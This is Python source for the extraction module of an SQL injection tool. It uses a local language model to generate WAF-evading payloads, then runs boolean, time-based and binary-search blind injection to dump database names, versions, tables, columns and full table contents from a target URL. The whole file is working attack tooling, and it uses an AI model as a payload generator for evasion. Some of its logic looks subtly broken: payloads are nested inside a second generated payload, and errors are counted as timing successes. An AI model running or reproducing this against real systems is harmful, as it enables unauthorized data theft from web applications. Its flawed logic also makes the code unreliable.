# ghauri/core/extract.py - AI-Powered Extractor (Ghauri-X v1.0)
# All payloads generated by Ollama — NO hardcoded strings anymore
# Works with boolean, time, error, union techniques

import time
import string
import random
from typing import Optional, List, Dict, Any
from ghauri.common.lib import json, re
from ghauri.core.ai import ai_engine  # ← Our AI engine
from ghauri.common.config import CONF

class Extractor:
    def __init__(self, session, dbms=None, technique=None):
        self.session = session
        self.dbms = dbms or "MySQL"
        self.technique = technique or "boolean-based"
        self.injection_type = "parameter"  # Will be updated by prober
        self.waf_name = "Unknown"
        self._length = None

    def _generate_payload(self, condition: str = "", goal: str = "test injection") -> str:
        """
        Generate a novel, AI-powered payload using Ollama.
        Falls back to smart mutation if Ollama is unreachable.
        """
        context = f"{self.technique} in {self.injection_type} ({goal})"
        return ai_engine.generate_payload(
            dbms=self.dbms,
            technique=self.technique,
            condition=condition,
            injection_point=context,
            waf=self.waf_name
        )

    def _is_injectable(self, payload: str) -> bool:
        """Send payload and check if response differs from baseline."""
        try:
            baseline = self.session.get(self.session.url.replace("FUZZ", "safe123"))
            test = self.session.get(self.session.url.replace("FUZZ", payload))
            
            if test.status_code != baseline.status_code:
                return True
            if abs(len(test.text) - len(baseline.text)) > 200:
                return True
            indicators = ["sql", "syntax", "error", "mysql", "postgresql", "oracle", "mssql"]
            if any(ind in test.text.lower() for ind in indicators):
                return True
            return False
        except:
            return False

    def _boolean_test(self, condition: str) -> bool:
        payload = self._generate_payload(condition, "boolean test")
        return self._is_injectable(payload)

    def _time_test(self, delay: int = 5) -> bool:
        payload = self._generate_payload(f"IF(1=1,SLEEP({delay}),0)", "time delay")
        start = time.time()
        try:
            self.session.get(self.session.url.replace("FUZZ", payload), timeout=delay + 10)
            return (time.time() - start) >= delay
        except:
            return True  # Timeout = success

    def _extract_length(self, query: str) -> int:
        """Extract length using AI-generated conditions."""
        low, high = 1, 1000
        while low <= high:
            mid = (low + high) // 2
            condition = f"LENGTH(({query}))={mid}"
            payload = self._generate_payload(condition, "length check")
            if self._boolean_test(payload):
                low = mid + 1
            else:
                high = mid - 1
        return high

    def _extract_char(self, query: str, pos: int) -> Optional[str]:
        """Extract single character using binary search + AI payload."""
        chars = string.printable[:95]
        low, high = 0, len(chars) - 1
        while low <= high:
            mid = (low + high) // 2
            char_code = ord(chars[mid])
            condition = f"ASCII(SUBSTRING(({query}),{pos},1))>{char_code}"
            payload = self._generate_payload(condition, f"char {pos} binary search")
            if self._boolean_test(payload):
                low = mid + 1
            else:
                high = mid - 1
        if high >= 0 and high < len(chars):
            return chars[high]
        return None

    def extract(self, query: str) -> str:
        """Main extraction loop — now 100% AI-powered"""
        print(f"[*] Extracting: {query}")
        result = ""

        # Get length
        length = self._extract_length(query)
        print(f"[+] Length: {length}")

        # Extract each character
        for pos in range(1, length + 1):
            char = self._extract_char(query, pos)
            if char is None:
                print(f"[!] Failed at position {pos}")
                break
            result += char
            print(f"[+] Progress: {result}")

        return result.strip()

    def dump_database_name(self):
        query = "DATABASE()" if self.dbms == "MySQL" else "CURRENT_DATABASE()"
        return self.extract(query)

    def dump_version(self):
        query = "@@VERSION" if self.dbms == "MySQL" else "VERSION()"
        return self.extract(query)

    def dump_tables(self):
        query = "(SELECT GROUP_CONCAT(table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=DATABASE())"
        return self.extract(query)

    def dump_columns(self, table: str):
        query = f"(SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM information_schema.columns WHERE table_name='{table}')"
        return self.extract(query)

    def dump_data(self, table: str, columns: str):
        query = f"(SELECT GROUP_CONCAT(CONCAT({columns}) SEPARATOR 0x7e) FROM {table})"
        return self.extract(query)
